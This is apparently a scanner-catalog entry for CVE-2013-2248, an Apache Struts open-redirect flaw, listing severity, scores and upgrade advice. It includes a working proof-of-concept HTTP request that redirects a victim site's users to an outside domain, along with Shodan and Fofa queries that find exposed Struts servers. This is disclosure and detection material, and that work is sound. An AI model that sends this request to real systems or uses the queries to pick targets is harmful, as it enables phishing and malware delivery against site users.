| Title | Apache Struts - Multiple Open Redirection Vulnerabilities |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware. |
| Remediation | Developers should immediately upgrade to Struts 2.3.15.1 or later. |
| CVSS Score | 5.8 |
| EPSS Score | 0.93524 |
| CVE ID | CVE-2013-2248 |
| CWE ID | CWE-20 |
| Shodan Query | http.html:"apache struts"http.title:"struts2 showcase"http.html:"struts problem report" |
| Fofa Query | body="struts problem report"title="struts2 showcase"body="apache struts" |
| Tags | cve2013 cve apache redirect struts edb vuln |
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/10.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-2248.yaml
🦈 Packet Capture: ⬇️ Download cve-2013-2248.pcap
N/AN/A